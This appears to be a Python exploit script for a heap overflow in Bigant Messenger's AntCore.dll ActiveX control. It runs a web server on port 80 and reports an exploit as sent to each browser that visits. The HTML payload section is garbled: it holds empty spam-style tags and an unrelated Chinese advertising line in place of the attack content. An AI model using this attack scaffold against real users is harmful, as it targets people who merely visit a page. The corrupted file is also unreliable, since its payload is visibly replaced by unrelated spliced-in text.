#!/usr/bin/python # ######################################################################################### # Bigant Messenger <= v2.52 - (AntCore.dll) RegisterCom() Remote 0day Heap Overflow Exploit # Found by: Steven Seeley - mr_me( AT )corelan.be - http://net-ninja.net/ # Homepage: http://www.bigantsoft.com/ # Download: http://www.bigantsoft.com/download.html # Tested on: Windows XP SP3 (IE 6 & 7) # Marked safe for scripting: No # Advisory: http://www.corelan.be:8800/advisories.php?id=10-033 # Patch: http://www.bigantsoft.com/software/BigAnt255SP8.zip # Greetz: Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # ######################################################################################## # Note: There are many other vulnerable controls in this dll such as ListBoard(). # ######################################################################################## # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. # ######################################################################################## from BaseHTTPServer import HTTPServer from BaseHTTPServer import BaseHTTPRequestHandler import sys class myRequestHandler(BaseHTTPRequestHandler): def do_GET(self): self.printCustomHTTPResponse(200) if self.path == "/": target=self.client_address[0] self.wfile.write(""" 
    <pre id="vvttv"><mark id="vvttv"><progress id="vvttv"></progress></mark></pre>
    <pre id="vvttv"></pre>
      <p id="vvttv"></p>

          

          <p id="vvttv"></p>
                <p id="vvttv"></p>
                

                <pre id="vvttv"><cite id="vvttv"><progress id="vvttv"></progress></cite></pre>
                  
<output id="vvttv"><dfn id="vvttv"><th id="vvttv"></th></dfn></output>
                    <p id="vvttv"></p>
                    

                    ~ mr_me presents ~
                    

                    Bigant Messenger <= v2.52 - (AntCore.dll) RegisterCom() Remote 0day Heap Overflow Exploit
                    


                      <pre id="vvttv"><mark id="vvttv"><progress id="vvttv"></progress></mark></pre>
                      <pre id="vvttv"></pre>
                        <p id="vvttv"></p>

                            

                            <p id="vvttv"></p>
                                  <p id="vvttv"></p>
                                  

                                  <pre id="vvttv"><cite id="vvttv"><progress id="vvttv"></progress></cite></pre>
                                    
<output id="vvttv"><dfn id="vvttv"><th id="vvttv"></th></dfn></output>
                                      <p id="vvttv"></p>
                                      

这里只有精品视频


""")
        print ("\n\n(+) Exploit sent to the target %s." % (target))

  def printCustomHTTPResponse(self, respcode):
    self.send_response(respcode)
    self.send_header("Content-type", "text/html")
    self.send_header("Server", "myRequestHandler")
    self.end_headers()

httpd = HTTPServer(('', 80), myRequestHandler)

print ("""
\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
\tBigant Messenger <= v2.52 - (AntCore.dll) RegisterCom() Remote 0day Heap Overflow Exploit
\tFound by: Steven Seeley - mr_me( AT )corelan.be
\tTested on windows XP sp3 (IE 6/7)
\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
""")
print ("(+) Listening on port 80.")
print ("(+) Have someone connect to you.")
print ("\nType -c to exit..")
try:
     httpd.handle_request()
     httpd.serve_forever() 
except KeyboardInterrupt:
       print ("\n\n(-) Exiting Exploit.\n\n")
       sys.exit(1)